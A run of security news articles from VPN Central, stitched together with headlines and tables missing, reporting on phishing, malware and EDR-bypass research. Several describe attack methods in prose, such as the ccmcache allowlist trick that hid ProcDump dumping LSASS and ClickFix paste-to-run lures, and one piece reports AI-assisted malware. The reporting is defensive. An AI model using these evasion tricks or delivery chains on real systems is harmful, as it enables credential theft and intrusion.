The tactic matters because it changes how phishing feels to the victim. Instead of sending users straight to a fake login page, the attackers place them inside a support-style conversation that looks more personal and more trustworthy. Cofense says that real-time interaction lowers suspicion and increases the chance that victims will share sensitive information.

Cofense documented two variants. One spoofed PayPal and promised a $200 refund through a “View Transaction Details” button. The other used a generic order-confirmation lure with a “View Update” link and no visible brand until the victim clicked through. Both routes ended on LiveChat-hosted pages impersonating well-known brands.

How the attack works

In the PayPal-themed version, the victim lands in a LiveChat session that quickly pushes them toward a fake PayPal login page. Cofense says the victim enters login credentials, then submits a multi-factor authentication code sent to their phone. After that, the phishing flow asks for billing details, including payment card information and date of birth, before returning the victim to the LiveChat window with a fake refund confirmation.

The Amazon-themed version uses a slightly different flow. Cofense says the page first requests the user’s email address before a supposed live agent appears. From there, the attacker asks for identity details such as a phone number, date of birth, home address, and then full payment card data, including the card number, expiration date, and CVC.

Cofense notes that the attacker language in at least one chat included misspellings and awkward phrasing, which suggests a human operator working from a script rather than a polished automated chatbot. That roughness did not stop the scam from progressing through multiple data collection stages.

Why this tactic is more dangerous than it looks

The biggest advantage for the attackers is trust transfer. Because the links use a legitimate SaaS support environment, the domain and interface may feel safer than a typical phishing page on a random site. That can make victims less cautious, especially when the lure involves a refund or a suspicious order they want to resolve quickly.

The tactic also helps phishers collect more than one kind of data in one session. Instead of grabbing only credentials, they can move from identity details to card data to MFA codes in a single guided conversation. That gives them a fuller victim profile and increases the chance of account takeover or payment fraud. This is an inference from Cofense’s documented multi-stage collection flow.

Key details at a glance

The details in this table come from Cofense’s March 2026 analysis.

What users and security teams should watch for

• Be suspicious of unsolicited refund or order-confirmation emails that push you into chat instead of the brand’s official website or app.
• Never share MFA codes, full card details, or date of birth inside a support chat opened from an email link. This advice follows directly from the collection steps Cofense observed.
• Verify transactions by going to the official PayPal, Amazon, or merchant site yourself rather than clicking through an email.
• Monitor for traffic to suspicious lc.chat URLs and review email security controls for SaaS-hosted phishing links. This recommendation is based on the use of LiveChat-hosted infrastructure in the campaign.

FAQ

The post Phishers abuse LiveChat support tools to steal sensitive data in new SaaS-based tactic appeared first on VPN Central.

The finding did not mean attackers could disable Cortex XDR outright. The bigger issue was logic. Once the researchers decrypted the rule set, they found allowlist conditions that could be abused to bypass a large share of detections, including a demonstration that used Sysinternals ProcDump to dump LSASS memory without triggering those BIOC rules when the command line included the ccmcache path string.

InfoGuard Labs says it disclosed the issue to Palo Alto Networks in July 2025. Palo Alto later addressed the problem, and the researchers say the bypass is fixed in Cortex XDR Agent 9.1 when paired with Content version 2160, largely by removing the broad global allowlists that made the evasion possible.

What the researchers found

Palo Alto Cortex XDR uses BIOC rules to detect suspicious behavior on endpoints. Palo Alto’s own documentation says these rules cover behaviors tied to processes, registry activity, files, and network events, and that tenants automatically receive preconfigured global BIOC rules through content updates.

InfoGuard Labs says it analyzed Cortex Windows agent versions 8.7 and 8.8 during a red team engagement and traced how the encrypted rules were decrypted. According to the researchers, the decryption process depended on a hardcoded string in the agent files plus values from a plaintext Lua configuration file, which let them recover the rule set in readable form.

Once decrypted, the rule set revealed what InfoGuard described as numerous exceptions and global whitelists. The most important was a rule condition tied to the exact string \Windows\ccmcache in command-line arguments. The researchers say that condition bypassed about half of the platform’s behavioral detections.

Why the ccmcache exception matters

The exception mattered because it was simple to abuse. An attacker did not need a rare exploit or a complex loader. They only needed to append the allowlisted path string to a tool or command that would normally trigger a behavioral rule. InfoGuard’s example used ProcDump from Microsoft Sysinternals to dump LSASS memory, a well-known credential theft technique.

That does not mean every Cortex XDR protection failed at once. This issue centered on BIOC-based behavioral detections, not every possible detection layer in the product. Still, BIOC rules are a major part of Cortex XDR’s behavior-focused detection model, so a broad exception inside them created a serious blind spot. This is an inference based on Palo Alto’s own description of how BIOCs work and InfoGuard’s analysis of the evasion path.

What Palo Alto changed

InfoGuard says Palo Alto Networks fixed the issue at the end of February 2026. According to the researchers, the important fix was not stronger encryption by itself. It was the removal of the permissive global allowlists that made the bypass possible in the first place.

The researchers also say Palo Alto modified how the key generation process works, but they describe the whitelist removal as the main security improvement. They add that a single implant bypassing all rules at once is no longer possible, though they caution that attackers who study the decrypted rules may still find narrower exceptions worth abusing.

Palo Alto’s documentation confirms that Cortex XDR Agent 9.1 became available on January 25, 2026, and that global BIOC rules are delivered through content updates.

Key details at a glance

Why this raises a bigger security question

This case adds to the debate around closed detection ecosystems. InfoGuard argues that hiding rule logic through encryption can create a false sense of safety if the rules themselves contain flawed assumptions or overbroad exceptions. The weakness here was not just secrecy. It was trust in hidden logic that turned out to be easier to abuse than expected.

Palo Alto’s platform does let tenants manage user-defined and global BIOC rules, disable them, copy them, and create exceptions. That flexibility is useful for tuning, but it also shows why rule design matters as much as rule confidentiality.

What defenders should do

• Update Cortex XDR agents and content so systems run the fixed rule set described by InfoGuard.
• Review whether operational workflows rely on path-based exceptions or broad allowlists that attackers could mimic. This recommendation follows from the evasion path InfoGuard described.
• Test detection coverage against common living-off-the-land tools such as ProcDump, especially when arguments or paths can influence rule behavior.
• Treat preconfigured global detections as useful starting points, not as logic that never needs validation.

FAQ

The post Researchers decrypt Palo Alto Cortex XDR BIOC rules and expose major evasion blind spot appeared first on VPN Central.

The larger point is not just the malware itself. It is what the malware says about the threat landscape. Network devices used to sit mostly in the crosshairs of advanced espionage actors, but Eclypsium says the same weak spots now attract botnet operators and cryptojacking crews as well.

That trend matches broader industry data. Eclypsium cites the 2025 Verizon Data Breach Investigations Report as showing an almost eightfold increase in exploitation of edge and network devices, while Google’s threat intelligence work found that nearly a quarter of zero-days exploited in 2025 targeted network and security technologies.

What Eclypsium found

Eclypsium says the first malware sample is a previously undocumented CondiBot variant, a Mirai-derived DDoS botnet designed to turn Linux systems into attack nodes. The second is Monaco, a Go-based SSH scanner and Monero cryptominer that brute-forces weak SSH credentials, compromises exposed systems, and uses them for cryptocurrency mining.

Neither sample had been previously reported on major threat intelligence platforms when Eclypsium found them. The company says that included platforms such as VirusTotal, ThreatFox, Hybrid Analysis, and ELF Digest.

Why the new CondiBot variant stands out

Eclypsium says this CondiBot sample is a generic Linux botnet agent rather than something limited to one vendor. It supports ARM, ARM5, ARM6, ARM7, MIPS, x86, and x86_64, which gives it a broad reach across vulnerable Linux-based devices.

The malware uses a layered delivery routine that cycles through wget, curl, tftp, and ftpget so it can still pull down payloads even if some tools are missing on the target system. Once active, it connects to its command server, disables reboot utilities by setting permissions to 000, manipulates the hardware watchdog, and kills competing botnets running on the same machine.

Eclypsium also found a string inside the binary labeled QTXBOT, which had not appeared in earlier Condi reporting. The researchers say this may indicate a forked variant or an internal project name used by the developers. They also noted that the sample registers 32 attack handlers, more than earlier reported Condi versions, which suggests the addition of new flood techniques or protocol variants.

What Monaco does after it gets in

Monaco takes a different path. Eclypsium says it is written in Go 1.24.0 and acts as both an SSH scanner and a Monero cryptominer. It brute-forces exposed SSH servers across the internet, steals valid credentials, and sends them back to its command-and-control server.

The malware supports multiple architectures, including x86-64, ARM32, ARM64, and MIPS big and little endian, which lets it target servers, routers, IoT gear, and even some Juniper equipment. Eclypsium says Monaco deploys XMRig or XMRigCC to mine Monero through MoneroOcean after it compromises a host.

Eclypsium traced Monaco’s C2 infrastructure to Alibaba Cloud Singapore at 8.222.206.6. The researchers said the operator left behind open directory listings, debug builds, and default tokens, which point to relatively weak operational security.

Key details at a glance

Why network devices keep attracting attackers

Attackers like these devices because they sit at critical points in the network and often run embedded systems that do not support standard endpoint security tools. If an attacker gains control of a router, firewall, or switch, that foothold can support persistence, traffic interception, lateral movement, or large-scale abuse for botnets and mining.

Eclypsium argues that many organizations still treat network gear as opaque infrastructure rather than as endpoints that need the same level of monitoring and security review as servers and laptops. That visibility gap is one reason these campaigns keep working.

What organizations should do

• Audit internet-facing network devices for unknown processes, suspicious outbound connections, and signs of cryptomining activity.
• Replace weak or default SSH credentials immediately and restrict SSH access to trusted IP ranges.
• Keep firmware and software up to date on routers, firewalls, VPN gateways, and IoT hardware.
• Isolate or retire end-of-life devices that no longer receive vendor patches.
• Treat network appliances as critical assets that require active monitoring, not as blind spots outside normal endpoint security programs. This last point follows directly from Eclypsium’s broader analysis.

FAQ

The post New CondiBot variant and ‘Monaco’ cryptominer expand threats to network devices appeared first on VPN Central.

The company has not publicly confirmed that tens of thousands of devices were wiped. What Stryker has confirmed is a major cyberattack with broad operational impact, including disruption to ordering, manufacturing, shipping, and internal communications. Handala has claimed responsibility, and outside researchers have linked the actor to destructive operations associated with Iran-linked activity, but some of the larger public claims about device wipe counts and data theft remain unverified by Stryker itself.

Stryker has also said it has “no indication of ransomware or malware” and believes the incident is contained. That wording matters because it suggests the company has not publicly classified the event as a conventional ransomware attack, even though security researchers tracking Handala have described the group as one that uses destructive wiping techniques.

What Stryker has confirmed

In its March 11 SEC filing, Stryker said it identified a cybersecurity incident affecting certain information technology systems that caused a global disruption to its Microsoft environment. The company said it launched an internal investigation with external support to assess and contain the threat, and warned that the incident could continue to disrupt operations until recovery is complete.

In customer updates published after the filing, Stryker said it was prioritizing restoration of customer-facing ordering and shipping systems first. It also said there was no timeline yet for full recovery, though it described core transactional systems as being on a path to recovery.

The company also stressed that its medical products remain safe to use. Stryker said connected or clinical platforms such as LIFEPAK, Mako, SurgiCount, Vocera Ease, Vocera Edge, and care.ai were unaffected because they either are not connected in the same way or run on separate infrastructure.

What is still not confirmed

Handala and some outside reports have claimed very large-scale destruction, including wipes affecting more than 200,000 devices and the theft of tens of terabytes of data. Stryker has not confirmed those figures in its SEC filing or customer updates. Reuters also reported the group’s claims, but noted that they had not been independently verified.

Reports from Arctic Wolf and Unit 42 point to possible misuse of Microsoft Intune and destructive wipe activity in Handala-linked incidents, but Stryker itself has not publicly said Intune was the initial cause or confirmed the exact wipe mechanism used in its environment.

So the strongest accurate framing is this: Stryker has confirmed a serious cyberattack with major business disruption, while researchers and the threat actor itself claim the operation involved destructive wiping. The exact device count and full scope of data loss remain publicly unconfirmed by Stryker.

Why researchers believe this was a destructive operation

Check Point says Handala Hack, also tracked as Void Manticore, is an Iranian threat actor linked to Iran’s Ministry of Intelligence and Security. Its recent campaigns have used RDP, tunneling tools such as NetBird, custom wiping tools, and manual destructive actions to damage victim environments.

Unit 42 separately warned of an increased risk of Handala-linked wiper attacks and said recent destructive operations reportedly involved phishing and abuse of administrative access through Microsoft Intune. That aligns with the pattern seen in public reporting around the Stryker case, though again, Stryker has not itself confirmed the detailed kill chain.

Operational impact on Stryker

The company told customers that the attack disrupted order processing, manufacturing, and shipping. Reuters separately reported that Stryker’s shares fell after the incident became public and noted that the company had no immediate timeline for full restoration.

Stryker employs about 56,000 people and operates in 61 countries, so even a disruption limited to its internal Microsoft environment can create major downstream effects across support, logistics, and corporate operations.

Key details at a glance

FAQ

The post Stryker confirms destructive cyberattack as Handala-linked incident disrupts global operations appeared first on VPN Central.

These attacks focus on disruption and destruction rather than quiet intelligence collection alone. Check Point says the group conducts fast, hands-on operations inside victim networks, then deploys several wiping methods at once so recovery becomes much harder. The company says recent activity has targeted organizations in Israel and Albania, while the group has also expanded to U.S. organizations, including medical technology giant Stryker.

The newer campaigns show several tactical changes. Check Point says the actor has started using NetBird, a legitimate peer-to-peer networking tool, to tunnel traffic inside victim environments, and has also deployed an AI-assisted PowerShell script as part of its destructive toolkit. The researchers also said the group showed weaker operational security in some cases, with activity traced directly to Iranian IP addresses instead of commercial VPN services.

How the attacks begin

Check Point says the intrusion often starts with compromised VPN credentials. The actor obtains access through brute-force attempts or supply-chain compromises involving IT service providers, then moves manually through the environment over Remote Desktop Protocol. In at least one victim network, the researchers observed five attacker-controlled machines operating at the same time, which points to an effort to spread damage as quickly as possible.

Once inside, the operators use built-in Windows tooling, credential theft, and lateral movement techniques that Check Point says have stayed fairly consistent from 2024 through 2026. The newer additions, including NetBird, fit into that same playbook by giving the attackers another way to maintain internal access and route traffic around normal controls.

What makes the destructive phase different

Check Point says Handala’s destructive phase runs several wiping methods in parallel. One of the main tools is a custom Handala Wiper distributed through Group Policy logon scripts by way of a batch file named handala.bat. The report says this wiper overwrites file contents and corrupts the Master Boot Record, which adds deeper system damage beyond ordinary file deletion.

The researchers also describe an AI-assisted PowerShell wiper that deletes files from user directories and floods logical drives with a propaganda image named handala.gif. In parallel, the attackers use VeraCrypt, a legitimate encryption tool, to lock drives and make recovery harder. They also manually delete virtual machines and individual files over RDP, a tactic that Check Point says appears in the group’s own leaked videos.

That layered approach matters because it reduces the chance that defenders can stop the attack by blocking just one payload. If one wiping path fails or gets interrupted, others may still destroy enough data to cripple the victim. That conclusion follows directly from Check Point’s description of multiple simultaneous wiping tracks.

Why NetBird stands out

NetBird is not malware. It is a legitimate networking tool, which gives the attackers a practical way to tunnel traffic through the environment while blending in with allowed software. Check Point lists NetBird as one of the newly observed tactics in these intrusions, which suggests the actor is expanding its use of dual-use tools rather than relying only on custom malware.

That trend fits Check Point’s broader assessment of Iranian cyber activity. In a separate March 2026 report, the company said MOIS-linked actors increasingly mix state-directed operations with tools, infrastructure, and access patterns borrowed from the cybercrime ecosystem.

Key details at a glance

What defenders should do

• Enforce multi-factor authentication on VPN, remote access, and privileged accounts. Check Point explicitly recommends this because compromised remote access remains a core entry point.
• Monitor for logins from unusual countries, strange hours, unfamiliar devices, and abnormal VPN transfer patterns.
• Disable RDP where it is not needed, especially on systems that should never allow broad remote administration.
• Watch closely for NetBird and other tunneling tools in environments where they are not approved.
• Prepare for multi-tool destructive activity, not just one malware family, because Handala’s impact comes from parallel wiping and manual operator actions together. This last point is an inference from Check Point’s case descriptions.

FAQ

The post Handala Hack uses RDP, NetBird, and parallel wipers in MOIS-linked destructive intrusions appeared first on VPN Central.

What makes the operation stand out is its infrastructure model. Instead of building dedicated attacker-controlled servers, the operators host payloads on the public file-sharing site filebulldogs[.]com and move stolen files to MEGA cloud storage. That approach helps the traffic blend into ordinary internet activity and makes network-based detection harder.

Seqrite says the campaign first surfaced in late February 2026, when a suspicious ZIP file themed around Algeria’s Ministry of Housing appeared on VirusTotal. The researchers later found additional samples using Mongolia, Algeria-Ukraine cooperation, and Kuwait Air Force themed lures, which pointed to a broader intelligence-focused operation rather than an isolated phishing run.

How the CamelClone attack works

Each observed archive contained a malicious Windows shortcut file and a decoy image or document designed to look official. Seqrite says that when the victim opens the shortcut, a hidden PowerShell command runs silently, switches to the Temp directory, downloads a JavaScript file named f.js from filebulldogs[.]com, saves it locally, and executes it to continue the infection chain.

Seqrite tracks that JavaScript loader as HOPPINGANT. The file runs under Windows Script Host and launches two Base64-encoded PowerShell commands. Those commands download a decoy PDF to distract the victim, then fetch another archive named a.zip, which contains a portable copy of Rclone version 1.70.3.

After extracting Rclone, the script rebuilds a password with a simple XOR routine using the key value 56, then uses those credentials to authenticate to a MEGA account registered with an onionmail.org address. Seqrite says the malware then collects .doc, .docx, .pdf, and .txt files from the Desktop and also tries to exfiltrate Telegram Desktop session data from the tdata directory.

Why researchers see this as espionage, not routine cybercrime

Seqrite says the targeting pattern points toward intelligence collection. The victims and lure themes focused on government bodies, defense procurement, foreign affairs, diplomatic cooperation, and strategic energy-linked environments. The company says that choice of targets, plus the geopolitical themes in the decoy files, aligns more closely with spying goals than with financially motivated cybercrime.

The campaign also shows discipline in how it separates its operations. Seqrite observed the same file-sharing domain across all four campaigns, but with different upload paths such as /uploads/AVQB61TVOX/, /uploads/OKW5RN48ZJ/, and /uploads/F1OQY9GU84/. The researchers believe that separation helps the attackers run multiple parallel campaigns while reducing the chance that one takedown removes every payload at once.

Key details at a glance

What makes CamelClone harder to detect

The campaign avoids the classic model of malware talking to a visible C2 server. Instead, it abuses public services that defenders often allow or treat as low-priority traffic. Seqrite says this model makes pure network detection less effective because the activity looks closer to standard web downloads and cloud storage use.

The attackers also reused key technical patterns across the campaigns. Seqrite says the same XOR key, the same HOPPINGANT loader family, and the same Rclone settings appeared in the different samples. Those overlaps strongly suggest a coordinated operation rather than unrelated attacks borrowing similar lures.

What organizations should do

• Treat unsolicited ZIP files that reference ministries, defense deals, or diplomatic cooperation as high risk.
• Restrict or monitor LNK execution from untrusted sources.
• Watch for PowerShell launching JavaScript or downloading files into Temp paths.
• Monitor outbound traffic to anonymous file-sharing sites and cloud storage services such as MEGA.
• Hunt for suspicious use of Rclone on systems where it should not normally appear. This last point follows from Seqrite’s documented use of Rclone in the campaign.

FAQ

The post CamelClone spy campaign abuses public file-sharing sites and Rclone in government-focused attacks appeared first on VPN Central.

Bitsight first observed RondoDox in May 2025 through heavy honeypot activity. The company says the malware reuses Mirai foundations, but unlike classic Mirai, RondoDox focuses on denial-of-service attacks rather than combining scanning, propagation, and DDoS activity inside one bot binary. Instead, the operators appear to split exploitation and hosting roles across separate infrastructure.

The standout detail is the size of the exploit arsenal. Bitsight says RondoDox implemented 174 different exploits, with 148 tied to known CVEs, 15 linked to public proof-of-concept code without formal CVEs, and 11 without public proof-of-concept code at all. That is an unusually broad set for a Mirai-style threat.

Researchers also found signs that the operators track vulnerability disclosures closely. Bitsight says the botnet adopted some exploits within days of public disclosure, including React2Shell, or CVE-2025-55182, which was added on December 6, 2025, just three days after disclosure. The researchers also said they saw one case where exploitation began before a CVE was officially published.

How RondoDox changed over time

Early in its campaign, RondoDox used what Bitsight described as a shotgun approach. The operators fired multiple exploits at the same target in hopes that one would work. According to the research, the number of distinct vulnerabilities used in a single day peaked at 49 on October 19, 2025.

That strategy later shifted. By January 2026, daily use dropped to just two active vulnerabilities, which Bitsight interprets as a move toward more selective and targeted exploitation instead of broad-volume probing.

Why the residential IP angle matters

One of the most unusual parts of the operation is the infrastructure split. Bitsight tracked 32 IP addresses over the observation period, with 16 used for exploitation and 16 used for hosting. The exploitation IPs mostly mapped to hosting providers that accept cryptocurrency, while many hosting IPs appeared to belong to ordinary residential internet providers in countries including the United States, Canada, Sweden, China, and Tunisia.

Bitsight says this strongly suggests the operators used compromised home or consumer devices as hosting infrastructure. Using the Groma dataset, the researchers found that four of 11 residential hosting IPs exposed potentially vulnerable services, including a UniFi Protect interface, two Control4 smart home systems, and a TCL Android TV web server.

That approach gives the botnet two advantages. It makes the infrastructure look less suspicious than traditional VPS hosting, and it can complicate takedown and attribution efforts because the servers may actually be hijacked consumer devices rather than rented attacker-owned systems. This second point is an inference from Bitsight’s findings about residential ISP usage and exposed consumer services.

Key details at a glance

What security teams should do

• Patch internet-facing devices quickly, especially embedded devices and remote management interfaces.
• Disable unused remote access services on home, branch, and edge-connected systems.
• Watch for repeated exploitation attempts against exposed services, especially newly disclosed flaws.
• Monitor outbound connections to suspicious hosting nodes and investigate consumer-device infrastructure where it should not exist. This detection advice partly follows from Bitsight’s infrastructure findings.
• Review the indicators of compromise Bitsight published through its GitHub-linked materials referenced in the report.

FAQ

The post RondoDox botnet expands to 174 exploits, using residential IP infrastructure at scale appeared first on VPN Central.

The pages usually present fake tracking details, a claimed reason for failed delivery, and a request to update address data or pay a small fee. The pressure is psychological, not technical. The goal is to make the victim act before thinking.

What makes the phishing technically dangerous

Group-IB says its HTML analysis found embedded scripts that open WebSocket connections and support live credential harvesting. In practice, that means attackers can receive entered data immediately, rather than waiting for the victim to submit a form and leave the page.

The researchers also found session tracking through unique UUID tokens, which suggests organized operations that manage victims individually and at scale. That infrastructure, combined with shared IPs, registrars, and hosting overlaps, points to coordinated phishing activity rather than isolated copycat pages.

Group-IB also says the campaign shows signs linked to Darcula, a Chinese-language phishing-as-a-service platform known for large volumes of counterfeit domains and ready-made phishing templates. The company says customers can review more detail about the activity and the Darcula Pushing Kit in its threat intelligence portal.

What Group-IB found in MEA

Why the scam keeps working

Shipment alerts blend into daily life. If people shop online often, they already expect delivery texts, tracking updates, and occasional address checks. Criminals exploit that normal behavior and make the fake message feel just plausible enough to trigger a fast tap.

The fake domains also help. Group-IB warns that many of these campaigns use disposable or low-cost extensions such as .xyz, .sbs, .top, and .click, which lets attackers replace blocked domains quickly and keep the scam moving.

How to protect yourself

• Do not tap shipment links from unexpected SMS messages. Go to the courier’s official website and enter the tracking number manually.
• Treat any message demanding urgent payment or address correction as suspicious. Legitimate courier companies usually do not charge for simple redelivery or basic address updates.
• Watch for unfamiliar domain endings such as .xyz, .sbs, .top, and .click.
• Use mobile security tools and browser protections that can flag phishing pages and suspicious links.
• Report scam messages to your postal operator or local cyber authority.

What businesses should do

• Publish clear alerts when scammers impersonate your brand.
• Strengthen domain protections and email authentication with DMARC, DKIM, and SPF. Group-IB’s post appears to contain a typo and says “SKIM,” but the standard email protocol is DKIM.
• Work with mobile operators to filter scam SMS patterns and block impersonation attempts.
• Offer a public verification tool so users can confirm whether a message or tracking request is legitimate.

FAQ

The post B says that in Egypt, for example, attackers were observed using numbers formatted to resemble local mobile prefixes. appeared first on VPN Central.

The finding matters because it shows how threat actors can now use AI to create working malware faster and with less development effort. IBM says Slopoly was technically mediocre, but its structure strongly suggested AI-assisted creation, including clear variable names, detailed comments, and coding choices that looked more like machine-generated output than hand-crafted malware.

IBM linked the activity to Hive0163, a group associated with extortion, large-scale data theft, and Interlock ransomware operations. X-Force says the group already uses a broader toolset that includes NodeSnake, InterlockRAT, and the JunkFiction loader, which helps explain why Slopoly appeared as just one part of a wider attack chain rather than as a standalone weapon.

What IBM found

According to IBM, Slopoly was a PowerShell script dropped on an already infected server and stored under C:\ProgramData\Microsoft\Windows\Runtime\. It established persistence through a scheduled task named Runtime Broker, then beaconed to a remote server using static configuration values such as a session ID, mutex name, C2 URL, and beacon intervals. IBM said it could not recover the commands the attackers ran during the period when Slopoly stayed active.

IBM also said the malware called itself a “Polymorphic C2 Persistence Client,” but the script did not actually show true polymorphic behavior. That mismatch was one reason the researchers described it as more ambitious in wording than in real capability.

Why IBM believes AI helped create it

IBM did not identify the exact model used to generate Slopoly, but the company said the code quality and structure pointed to a less advanced model. X-Force highlighted signs such as verbose comments, consistent error handling, descriptive variable names, and even an unused Jitter function that may have been left behind during iterative AI-assisted development.

IBM also said the variable naming suggested the model intended to build something malicious from the start, which implies any guardrails in the tool used to create the malware were bypassed or ineffective.

How the attack started

IBM says the intrusion began with a ClickFix technique. In that method, victims see a fake verification page that quietly places a malicious command in the clipboard, then tells them to open the Run dialog, paste it, and execute it. That manual action gives the attackers an easy path to launch PowerShell without needing a traditional exploit.

From there, the attack chain expanded in stages. IBM says NodeSnake arrived first as a Node.js backdoor, followed by InterlockRAT, which added web socket communication, a SOCKS5 tunnel, and a reverse shell. Slopoly came later, alongside tools such as AzCopy and Advanced IP Scanner, suggesting it served more as a persistence and operational support tool than as the initial foothold.

Key details at a glance

Why this matters beyond one case

IBM’s report lines up with a broader industry view that attackers have started using AI across different stages of cybercrime. Palo Alto Networks’ 2026 Unit 42 Global Incident Response Report says threat actors remain in the early stages of AI-enabled tradecraft, but the impact is already visible across reconnaissance, social engineering, scripting, troubleshooting, and extortion workflows.

That does not mean AI-generated malware is suddenly more advanced than traditional malware. IBM made the opposite point in this case. Slopoly was not especially sophisticated, but it proved that capable attackers can use AI to shorten development time and add custom tooling to a live ransomware operation.

What defenders should do

• Watch for ClickFix-style lures that push users to paste commands into the Run dialog or PowerShell.
• Monitor scheduled task creation, especially suspicious tasks such as Runtime Broker in unusual paths.
• Hunt for IBM’s published indicators, including the reported Slopoly C2 infrastructure.
• Use behavior-based detection, not just signature-based tools, since AI-assisted malware can change quickly and may not match known patterns.
• Review user training around fake verification pages and clipboard-based social engineering.

FAQ

The post IBM finds ‘Slopoly,’ likely AI-generated malware linked to Hive0163 ransomware attack appeared first on VPN Central.

The core problem is simple and serious. A private key should never ship inside a public installer. If an attacker gets that key before revocation takes effect, they may be able to impersonate covered subdomains, intercept traffic in some scenarios, or stand up convincing phishing infrastructure that appears cryptographically valid.

Reports tied to the disclosure say the key sat inside the installer under an OpenClaw component archive, alongside credentials for the myclaw.360.cn environment. The leaked certificate reportedly carried the subject CN=*.myclaw.360.cn, with a validity period running from March 12, 2026 to April 12, 2027.

What was exposed

The exposed material was not just a public certificate. Reporting around the incident says the installer contained the matching private key, and modulus checks showed that the key and certificate formed a valid pair. That is what turns a bad packaging mistake into a potentially high-impact security incident.

Because the certificate was a wildcard, the scope was broader than a single host. In general, a wildcard certificate can authenticate every covered subdomain under the same namespace, which increases the blast radius of any private key leak.

Why this matters

TLS private keys are the trust anchor behind HTTPS sessions. If a production key leaks, defenders have to assume the certificate is compromised, revoke it quickly, replace it, and review the build pipeline that allowed it to leave internal systems. That is especially true when the installer was available to the public.

The incident also lands awkwardly for Qihoo 360 because the company sells security software and positioned this AI product as a safer way to use the OpenClaw ecosystem. Public discussion of the case quickly focused on that contradiction.

What Qihoo 360 has said

A company response reported by Futu News says 360 promptly revoked the certificate and argued that ordinary users would not be affected because the related service operated only on local systems. I have not independently verified that claim from a primary company post, so it should be treated as a reported company response rather than a directly confirmed public statement from Qihoo 360.

That explanation may reduce the practical risk if the certificate truly protected only a localhost-style workflow. But it does not erase the packaging failure itself, and it leaves open important questions about why a valid private key ended up inside a public build.

Key details at a glance

Reported details above come from public disclosure and follow-up reporting.

What security teams should watch

• Public installers and update packages should never contain live production credentials.
• Code signing and release pipelines need automated checks for certificates, private keys, tokens, and other secrets before release.
• If a private key leaks, teams should revoke, replace, rotate, and investigate immediately.

FAQ

The post Qihoo 360 shipped wildcard SSL private key inside public AI installer appeared first on VPN Central.

The attack does not rely on a software vulnerability. Instead, it relies on social engineering and DLL sideloading, which makes the lure more effective because victims believe they are downloading a trusted FTP client from a real-looking site. Researchers traced the campaign to a lookalike domain, filezilla-project[.]live, hosting a tampered FileZilla 3.69.5 portable package.

Once launched, the malicious package loads a rogue version.dll before Windows reaches the legitimate system library. Malwarebytes said the archive contained 918 files, but only one stood out as suspicious: version.dll, which should not appear inside a clean FileZilla portable folder.

The campaign goes beyond simple sideloading. Malwarebytes reported that the trojanized FileZilla build quietly contacts attacker-controlled servers through encrypted DNS traffic, helping the malware hide its network activity inside normal-looking HTTPS requests.

How the fake FileZilla attack works

Researchers say victims land on a fake FileZilla page that closely mimics the real project site, then download a tampered installer or archive. In the observed sample, the threat actor used a legitimate portable build of FileZilla 3.69.5 and inserted a malicious version.dll into the application folder. When the victim opens filezilla.exe, Windows loads that DLL first because of its standard search order behavior.

This gives the attacker code execution without breaking the visible app. To the user, FileZilla still opens and behaves normally, which lowers suspicion and gives the malware time to continue the infection chain.

The reporting around this campaign also describes a stealthy loader sequence that can keep later stages in memory rather than dropping obvious files to disk. That design makes detection harder for security tools that focus mainly on static files and traditional installer behavior.

Why this campaign matters

The biggest risk is trust abuse. FileZilla is a well-known open-source tool, so many users will not question a familiar download page or a normal-looking setup flow. That makes fake download infrastructure especially effective against home users, freelancers, developers, and IT staff who often install utilities quickly.

This campaign also fits a wider trend. Malwarebytes recently documented other cases where attackers abused trusted software brands and fake download pages to push malware, including fake 7-Zip downloads and fake productivity software installers.

Key details at a glance

What users and admins should do

• Download FileZilla only from the official FileZilla project site.
• Treat lookalike domains and search-result download pages as high risk.
• Check the FileZilla folder for unexpected files such as version.dll.
• Monitor endpoints for DLL sideloading behavior and unusual outbound encrypted DNS activity.
• Reinstall the software from the official source if a user downloaded FileZilla from any unofficial site.

FAQ

The post Fake FileZilla downloads spread RAT through stealthy multi-stage loader appeared first on VPN Central.

The latest findings come from G DATA, which analyzed samples delivered through HijackLoader and tied to the long-running PiviGames lure infrastructure. According to the researchers, ACRStealer arrives as the final payload after victims are pushed through malicious links and redirected to archives that pose as legitimate installers. G DATA said the same infrastructure has also delivered LummaStealer, which suggests the operators can rotate payloads while keeping the rest of the distribution chain intact.

Proofpoint had already linked Amatera Stealer to ACRStealer in 2025, describing it as a rebranded and actively maintained information stealer sold as malware-as-a-service. That earlier research highlighted improved evasion and the use of NTSockets and direct WoW64 syscalls. G DATA’s newer report builds on that picture and shows the malware’s continued development.

What changed in this ACRStealer variant

G DATA says this version resolves functions by locating ntdll.dll through the Process Environment Block and parsing the Export Address Table, rather than leaning on the higher-level Win32 APIs that many security tools watch more closely. The malware then executes syscalls through the WoW64 transition gate, a method that can bypass user-mode hooks used by EDR products.

For network activity, the malware avoids standard Winsock APIs and instead builds an AFD endpoint path and opens it with NtCreateFile. After connecting, it completes a TLS handshake through Microsoft’s SSPI framework. G DATA said this variant used playtogga[.]com in the HTTP Host header and communicated with 157[.]180[.]40[.]106, which helped the traffic blend in with normal encrypted web sessions.

The stealer also broadens its data theft profile. Researchers said it targets browser credentials, cookies, login data, and Steam-related information, then writes stolen data to a hardcoded text file before exfiltration. The report also describes system fingerprinting that collects details such as machine GUID, username, architecture, locale, and build time.

Why defenders should pay attention

This is not just another browser credential stealer. The technical changes show an effort to reduce visibility at both the endpoint and network level. By mixing direct syscalls, AFD-based socket creation, and TLS-wrapped traffic, the malware removes several of the easier signals defenders often use for detection.

The delivery model matters too. G DATA said the PiviGames infection chain remained active into early 2026 and had started serving LummaStealer through a Mega-hosted Setup.exe in some cases. That means defenders cannot focus only on one payload family. They need to watch the loader, redirection chain, and infrastructure behind it.

Key technical details at a glance

Indicators and defensive steps

• Monitor for unusual use of low-level APIs such as NtCreateFile, NtOpenFile, and NtQueryDirectoryFile.
• Hunt for suspicious AFD-based socket activity that bypasses normal Winsock telemetry.
• Block or investigate traffic involving 157[.]180[.]40[.]106 and playtogga[.]com where appropriate.
• Watch for HijackLoader behavior and staged malware delivered through gaming forums, social platforms, and fake software links.
• Educate users not to open installers from unverified links shared through Discord, Reddit, Steam communities, or file-sharing redirects.

FAQ

The post New ACRStealer variant uses syscall evasion, TLS C2, and flexible payload switching appeared first on VPN Central.

The outage affected Exchange Online mailbox access rather than just a single app. According to Microsoft’s incident messaging, impacted methods included Outlook on the web, Outlook desktop, Exchange ActiveSync, and other Exchange Online connection protocols. That means the disruption could hit users across browser, desktop, and mobile access paths.

